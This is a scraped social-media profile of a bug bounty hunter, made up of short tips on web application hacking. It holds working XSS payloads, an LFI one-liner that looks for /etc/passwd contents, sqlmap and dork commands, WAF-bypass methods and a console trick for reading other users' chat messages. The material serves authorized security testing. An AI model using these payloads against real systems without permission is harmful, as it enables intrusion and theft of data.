Otterly Profile Banner
Otterly Profile
Otterly

@ott3rly

Followers
5,088
Following
240
Media
127
Statuses
951

Bug Bounty Hunger. Helping people to score bounties 💰

Kaunas, Lietuva
Joined November 2016
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@ott3rly
Otterly
8 months
Top 3 RXSS payloads I use: `'";//><img/src=x onError="${x};alert(`1`);"> `'";//><Img Src=a OnError=location=src> `'";//></h1><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE%3d"))> #bugbounty #xss #bugbountytips
Tweet media one
6
131
420
@ott3rly
Otterly
4 months
File upload functionality could be very dangerous and could easily get you RCE or XSS. It has a large attack surface so it's a pretty interesting thing to look for. I usually use the following regex on burp history to look for those OR just use the word "upload". #bugbounty
Tweet media one
2
56
284
@ott3rly
Otterly
4 months
2
44
280
@ott3rly
Otterly
3 months
1
47
264
@ott3rly
Otterly
6 months
6
50
228
@ott3rly
Otterly
4 months
6
35
203
@ott3rly
Otterly
8 months
I hate when a top-tier bug bounty hunter mentions on some podcast what he/she prefers checking sensitive areas of the application without mentioning where. A lot of beginners need help figuring out how to start and where to look for common issues. Here is my list of critical
Tweet media one
4
51
193
@ott3rly
Otterly
9 months
My favorite ways to find API endpoints: 1️⃣ Check if targets have the swagger UI docs using nuclei: cat targets.txt | nuclei -id swagger-api | anew swagger-ui-endpoints.txt 2️⃣ Bruteforcing using dictionaries like or for better
3
56
188
@ott3rly
Otterly
4 months
If you have issues bypassing WAF on POST/PUT/PATCH methods manually, you could try this extension: Absolute game-changer. Credits to @infosec_au for bringing this in for public. #bugbounty
2
58
178
@ott3rly
Otterly
5 months
Whenever I see this icon on the website, I always open the browser dev tools console and paste these: - Intercom('show'); - Intercom('boot',{email:'known_user @gmail .com'}) If I can see messages of another person, it is an easy bounty! #bugbountytips #bugbounty #ethicalhacker
Tweet media one
6
35
173
@ott3rly
Otterly
9 months
Checklist 📝 for exploiting Windows IIS targets: ✅ Detect IIS instances - initial step to build wordlist of potential targets: 1️⃣ Nuclei: cat targets.txt | nuclei -silent -id tech-detect | grep "ms-iis" 2️⃣ Shodan dorks: - org:"Target inc." product:"IIS" -
5
64
168
@ott3rly
Otterly
8 months
I earned $3000 on @bugcrowd . Tip: always recheck the endpoints collected on the "targets" tab on the burp. After testing certain functionalities, new endpoints could appear which might lead to interesting findings. #ItTakesACrowd #bugbounty #bugbountytip
Tweet media one
2
11
163
@ott3rly
Otterly
4 months
Are you tired of seeing similar requests in Burp Suite HTTP history when working with GraphQL endpoints? Let me show you how to make GraphQL traffic more easily readable: Using HTTP history filtering options - Click on the HTTP history filter icon, and fill in your settings.
Tweet media one
Tweet media two
Tweet media three
Tweet media four
2
32
151
@ott3rly
Otterly
8 months
Want to test for SQLi, RCE, but the target is behind annoying WAF? These are ways to find the origin IP, to bypass WAF restrictions: ✅ Check shodan first. Use ssl: or http.favicon.hash:<HASH> dorks to check if there are any results. This method is the
3
37
138
@ott3rly
Otterly
6 months
Sometimes when arjun does not work properly for parameter guessing, I use ffuf instead: ffuf -u " https://target\.com/payment.php?FUZZ=regular" -w ~/wordlists/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt #bugbounty #bugbountytip #bugbountytips
Tweet media one
5
24
139
@ott3rly
Otterly
4 months
Quick LFI check oneliner for a fresh target: cat targets.txt | (gau || hakrawler || katana || gospider) | gf lfi | httpx -paths lfi_wordlist.txt -threads 100 -random-agent -x GET,POST -tech-detect -status-code -follow-redirects -mc 200 -mr "root:[x*]:0:0:" #bugbounty #infosec
2
36
135
@ott3rly
Otterly
5 months
One-liner to get subdomains from wayback: curl -s ' http://web\.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey' | sed -e 's_https*://__' -e "s/\/.*//" | sed 's/www\.//g' | sed 's/:80//g' | sort -u #bugbounty #bugbountytips #cybersecuritytips
1
28
132
@ott3rly
Otterly
8 months
Use this Shodan filter, to get more recently added hosts: org:"<Org name>" after:1/1/2024 #BugBounty #informationsecurity #infosec
Tweet media one
2
33
122
@ott3rly
Otterly
3 months
1
21
122
@ott3rly
Otterly
3 months
1
21
115
@ott3rly
Otterly
9 months
As promised, I am sharing my current checklist 📝 for small scope targets (v0.1): - API docs/support pages. Explore functionality to understand the app better. - Plans and pricing. Identify limitations of different plans, your goal will be detecting ways to bypass them. -
8
31
115
@ott3rly
Otterly
4 months
1
37
113
@ott3rly
Otterly
8 months
I earned $3,000 for my submission on @bugcrowd Tip: always check how the cart handles user input. You can find interesting, business logic errors, injections, etc. #ItTakesACrowd #bugbounty #infosecurity
5
4
109
@ott3rly
Otterly
7 months
After playing around with the targeted website, with the proxy on, run this filter to find file uploads: #bugbounty #bugbountytip #bugbountytips
Tweet media one
0
17
107
@ott3rly
Otterly
6 months
Do you know that sqlmap has its own crawler? Run in the background easily: sqlmap -u ' https://target\.com' --crawl=3 --random-agent --batch --forms --threads=5 --hostname --timeout=15 --retries=1 --time-sec 12 #appsec #SQLi #hacking
Tweet media one
2
26
106
@ott3rly
Otterly
4 months
Tired of seeing those OPTIONS method requests in your burp HTTP history? I have encountered this numerous times, and it has annoyed me a lot. Luckily, I have found the solution. We can use the "HTTP history filter" with "Bambda mode": 1. Go to the proxy tab. 2. On HTTP history,
Tweet media one
1
17
104
@ott3rly
Otterly
6 months
Base checklist 📝 for exploiting Tomcat servers: - Detect: → Wappalyzer → Nuclei → Server error - use this to get the version! → Response headers - Test common ports: 8080, 9080, 9443, 9005, 9009, 8082, 8180 - Try clicking on buttons - this is simply stupid but
Tweet media one
3
27
102
@ott3rly
Otterly
3 months
0
26
101
@ott3rly
Otterly
3 months
2
18
99
@ott3rly
Otterly
3 months
1
20
96
@ott3rly
Otterly
8 months
Use these commands to parse waymore/gau or any other URL output to find interesting leads: 1️⃣grep -oP '^https?://(?:[^/]*/){2}' waymore.txt | sort -u | tee root-dirs.txt # This output is good for checking different apps of different domains 2️⃣cat waymore.txt | unfurl keys | awk
4
20
93
@ott3rly
Otterly
7 months
Tip: If you are looking for wayback endpoints either by gau or waymore, do not pass the whole subdomain list of a single target. Both of these tools have a subdomain option, use that instead. #bugbounty #bugbountytips #bugbountytip
Tweet media one
1
11
89
@ott3rly
Otterly
8 months
I earned $950 for my submission on @bugcrowd Type: Business logic Tip: Try bypassing certain limitations, by using double submit. For example, open 2 browser tabs and try submitting both at the same time. #ItTakesACrowd #bugbounty #ethicalhacking
6
4
87
@ott3rly
Otterly
4 months
Sometimes using Shodan dork :"target" instead of :"" could reveal many more results for the "All in scope" target. Keep in mind that you will need to filter out them later to minimize OOS. #bugbounty #shodan
2
17
83
@ott3rly
Otterly
3 months
0
24
83
@ott3rly
Otterly
7 months
I earned $450 for my submission on @bugcrowd Even small bounties stack it up over time! Tip: Bypass product limits using race conditions. Either use the newest version of burp or turbo intruder plugin. #ItTakesACrowd #bugbounty #bugbountytips
4
5
83
@ott3rly
Otterly
1 month
Small tip for those who use xsshunter express as their blind xss framework: If you want to use import() function for your payloads (which is pretty good for some filter bypasses), you need to change the line 197 of probe.js file to var probe_return_data =
2
12
83
@ott3rly
Otterly
9 months
On @Bugcrowd , In January, I submitted 6 bugs to 4 programs. Award-wise, it's the most profitable platform so far. #bugbounty #TogetherStronger
Tweet media one
5
0
82
@ott3rly
Otterly
9 months
FFUF could be used for fuzzing one endpoint for large amount of alive hosts: cat alive.txt | grep -v "filter" | ffuf -u https://FUZZ/endpoint -w - -fw 1 replace filter and /endpoint with your own :) #bugbounty #bugbountytips #CyberSecurity
1
18
79
@ott3rly
Otterly
8 months
Sometimes Excel files could contain PII leaks, so use this Google dork: site:target\.com inurl:'xlsx' OR site:target\.com inurl:'xls' #ghacking #googlehacking #dorking
Tweet media one
0
20
78
@ott3rly
Otterly
4 months
1
21
78
@ott3rly
Otterly
6 months
DotGit Firefox extension could get you some serious P1/P2 vulnerabilities. It's a must-have in your hacker toolkit. Easy bug bounty money! #bugbounty #cybersecuritytips #ethicalhacking
Tweet media one
1
6
76
@ott3rly
Otterly
7 months
Use this one-liner to get a lot of fuzz endpoints from the crawler: cat targets.txt | hakrawler -d 5 -dr -insecure -t 10 -timeout 360 | tee hakrawler.txt #bugbounty #bugbountytips #bugbountytip
Tweet media one
2
16
76
@ott3rly
Otterly
9 months
One-liner of favicon hash for shodan: python3 -c "import mmh3,requests,codecs;print(mmh3.hash(codecs.encode(requests.get('[URL]',verify=False).content,'base64')))" Replace URL with and use http.favicon.hash:<HASH> #bugbounty #bugbountytips #infosecurity
Tweet media one
Tweet media two
2
21
72
@ott3rly
Otterly
5 months
Just checked tool from @dorkipty . It can gather data from over 100+ search engines and this is a very cool feature. I know this is a pretty fresh tool, so I am looking forward to getting some updates from the team @fattselimi @badcrack3r . The only thing
2
10
76
@ott3rly
Otterly
4 months
Damn, never thought this way. I have always excluded those. I guess this time I will do some checking as well ;)
@GodfatherOrwa
Godfather Orwa 🇯🇴
4 months
95% from hunters remove pics from endpoint my steps gathering all target endpoints filter the results just for pic extensions (cat endpoints.txt | egrep 'jpg|jpeg|png' > results.txt) filter to live send results for screenshot tool 1/2 #bugbountytips #bugbountytip #bugbounty
Tweet media one
30
116
715
2
2
75
@ott3rly
Otterly
7 months
I do have an OSCP cert by the way. Has it helped it to my bug bounty success? Not particularly, but I guess it did have some impact on my initial infosec journey. I have eventually transitioned from pen-testing to full-time bug hunting. #offsec #oscp #tryharder
Tweet media one
1
2
74
@ott3rly
Otterly
6 months
Check out my new blog post: Make Money 💸 Using Google Hacking #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder
3
20
74
@ott3rly
Otterly
4 months
Get endpoints from the apk file: apktool d app.apk -o uberApk; grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"# #g ' | anew | grep -v "w3\|android\|github\| http://schemas\.android\|google\|http://goo\.gl" #bugbounty #appsec #itsecurity
1
19
73
@ott3rly
Otterly
8 months
Base checklist for testing AEM instances 📋: ✅ Identify. 1️⃣ Testing manually ⇒ Check wappalyzer. ⇒ Check the source of page, should see adobe links. 2️⃣ Automated approach ⇒ Google Dorking - site: intitle:content/dam ⇒
0
21
72
@ott3rly
Otterly
11 months
One-liner to find sensitive PDF files on Wayback Machine for multiple domains (in the comments) #bugbountytip #bugbounty #informationsecurity
1
13
70
@ott3rly
Otterly
7 months
Another one-liner to get crawler endpoints: cat targets.txt | gospider -S - -q -d 5 -c 10 --sitemap --no-redirect -o gospider.txt Note: do not use for targets, with too many endpoints, like blogs, e-commerce sites, or social media. #bugbounty #bugbountytips #bugbountytip
Tweet media one
1
22
69
@ott3rly
Otterly
4 months
One-liner to find JavaScript files quickly using multiple tools: echo target\.com | (gau || hakrawler || gospider || katana) | grep -iE '.js'| grep -iEv '(.jsp|.json)' | anew js.txt #bugbounty #bugbountytips #hackers
2
22
69
@ott3rly
Otterly
4 months
0
12
69
@ott3rly
Otterly
1 month
Looks pretty cool. Gonna review this tool on today's stream. This will be a short break from XSS run.
@NahamSec
Ben Sadeghipour
1 month
I scanned a bunch of Vulnerability Disclosure Programs to test their APIs using SwaggerJacker for automated api hacking including: 1️⃣Brute forcing for API documentation 2️⃣ Authorization Issues 3️⃣ Automatically generating wordlists .. and more! 👀👉🏼
Tweet media one
8
69
445
2
9
69
@ott3rly
Otterly
5 months
A quick one-liner to get most of the wildcard domains of BBPs: curl -s https://raw\.githubusercontent.com/projectdiscovery/public-bugbounty-programs/main/chaos-bugbounty-list.json | jq ".[][] | select(.bounty==true) | .domains[]" -r #bugbounty #bugbountytip #bugbountytips
0
15
68
@ott3rly
Otterly
7 months
4 Stages of the Bug Bounty Hunter: - Learning about Bug Bounty -> Finding the First VALID Bug. Gain foundational knowledge, learn about vulnerabilities, methodologies, and try to identify initial vulnerabilities. Register on one or multiple bug bounty platforms like Hackerone,
4
13
66
@ott3rly
Otterly
9 months
Tip of the day - add the following flag to httpx to get more results: -H 'Referer: localhost' Some servers have checks for headers. You could also experiment with other headers like Origin, X-Forwarded-For and etc. #bugbounty #bugbountytips #infosec
0
17
66
@ott3rly
Otterly
8 months
Have a txt file with the list of js endpoints? Use this nuclei command to check for token leaks: cat js-endpoints.txt | nuclei -tags token,tokens -es info #bugbounty #cybersecuritytips #cybersecurity
Tweet media one
1
13
64
@ott3rly
Otterly
8 months
Google Dork to check old websites on broad scope target: "© <company>. All rights reserved." -2024 -2023 -2022 #dorking #googlehacking #ghacking #bugbounty
0
12
65
@ott3rly
Otterly
8 months
one-liner to quickly check unusual ports on many hosts using nmap: nmap -iL hosts.txt -Pn --min-rate 1000 --max-retries 1 --max-scan-delay 20ms -T4 --top-ports 1000 --exclude-ports 80,443,53,22,5060,8080 --open -oG nmap.out #bugbounty #networksecurity #nmap
3
12
62
@ott3rly
Otterly
4 months
Quick RXSS check for a fresh target: cat domains.txt | (gau || hakrawler || gospider || katana) | grep -Ev "\.(jpeg|jpg|png|ico|woff|svg)$" | uro | grep = | qsreplace "<img src=x onerror=prompt()>" | httpx -silent -nc -mc 200 -mr "<img src=x onerror=prompt()>" #bugbounty #xss
2
6
62
@ott3rly
Otterly
8 months
If you are thinking of a good port scanner that is simple and fast, you could check out https://github\.com/nullt3r/jfscan I have tested it and it's pretty accurate. Of course, nothing can replace OG Nmap entirely. #networksec #netsec #infosecurity
Tweet media one
0
12
63
@ott3rly
Otterly
6 months
Use this as a base checklist 📝 when testing cart 🛒functionality: 1️⃣ Is it possible to manipulate prices? - Try adding minus items. - Integer overflows. 2️⃣ Test coupon codes. - Add multiple coupon codes. - Race conditions - XSS payloads 3️⃣ postMessage issues. - Is the event
0
22
63
@ott3rly
Otterly
9 months
If you are using gau to fetch some archive data, make sure to exclude a lot of extensions with --blacklist flag: cat t | gau --subs --blacklist png,jpg,jpeg,gif,mp3,mp4,svg,woff,woff2,etf,eof,otf,css,exe,ttf,eot #itsecurity #bugbounty #informationsecurity
1
10
62
@ott3rly
Otterly
9 months
Check out my new blog post: Hunting Blind XSS on the Large Scale — Initial Setup #BugBounty #CyberSec #InfoSec #Blog #TogetherWeHitHarder
3
25
61
@ott3rly
Otterly
8 months
Use this google dork to detect AEM instances: site:target\.com inurl:/content/dam/ #bugbounty #googlehacking #dorking
Tweet media one
1
8
62
@ott3rly
Otterly
7 months
A quick way to scan for the s3 bucket list: s3scanner -bucket-file s3-buckets.txt -threads 16 | grep -aE 'Read|Write|Full' | tee results.txt #bugbounty #bugbountytip #bugbountytips
Tweet media one
0
19
61
@ott3rly
Otterly
4 months
The bug bounty is so addictive!
4
6
60
@ott3rly
Otterly
5 months
Make sure you train your brain everyday. Reading writeups helps me to keep up with a game. I do recommend checking this list of Bug Bounty blogs by @G0LDEN_infosec . https://raw\.githubusercontent.com/g0ldencybersec/bugbountybloglist/main/blogs.txt #bugbounty #bugbountytips
1
11
61
@ott3rly
Otterly
4 months
3
14
59
@ott3rly
Otterly
4 months
The options I like to use when getting alive subdomains: cat domains.txt | httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -sc -cl -title -t 100 -fr -nc | anew alive.txt
0
11
59
@ott3rly
Otterly
4 months
Find shodan queries from nuclei public templates locally: for i in `grep -aR severity ~/nuclei-templates | grep -Eav 'cves.json|TEMPLATES-STATS.json' | grep -aE 'critical|high' | grep -a http | awk -F ':' '/1/ {print $1}'`; do cat $i | grep shodan-query; done #bugbounty #hacking
1
10
59
@ott3rly
Otterly
4 months
If you see a preview page editor, board, etc., and you are able to edit it's contents, try placing following payload: <script>window.location.replace(' https://cnn\.com')</script> If exported doc contains cnn page, its vulnerable to XSS -> SSRF chain. #bugbounty #bugbountytip
1
8
57
@ott3rly
Otterly
3 months
Low and Medium vulnerabilities are usually not as interesting as High and Critical ones, but they can definitely serve as the bread and butter for consistent cash flow. If lows and mediums are the bread and butter, highs and crits are the ham and cheese on the top.
3
3
54
@ott3rly
Otterly
1 month
Pretty good. I was actually thinking to do something similar ;)
@Symbolexe
Yasin
1 month
Bug Bounty Hunting Search Engine I recommend this website to you!
Tweet media one
2
109
470
1
6
58
@ott3rly
Otterly
8 months
Another tip for testing RBAC issues: Use the Multi-Account Containers Firefox plugin. It could create a separate browser environment for each account you are testing. Pretty good tool when you have to test more than 2 account roles. #appsec #infosec #hacking
Tweet media one
4
11
59
@ott3rly
Otterly
6 months
Another useful thing that sqlmap has is the Google Dorking flag. Combine with your favorite dork increase change finding SQLi: sqlmap -g 'site: inurl:\".php?id=1\"' #SQLi #infosecurity #cybersecurity
Tweet media one
1
9
56
@ott3rly
Otterly
4 months
You know you had an intense hacking session when your repeater section has that many tabs. Should I update my cover image with this? 😆
Tweet media one
8
3
56
@ott3rly
Otterly
3 months
2
16
56
@ott3rly
Otterly
7 months
Writing a good bug bounty report will result in bigger bounties! There were some cases when I got high severity instead of medium, just because I had put a lot of effort into constructing quality a report. At the end of the day, the human factor plays a big role in bug bounty
Tweet media one
4
10
56
@ott3rly
Otterly
6 months
As promised, I will start doing some live videos after 1k subscribers. The plan is to do a recon part on YouTube and a hacking part on Discord. The main reason for that - hacking on live targets is pretty grey in terms of service of YouTube.
4
1
57
@ott3rly
Otterly
4 months
0
18
55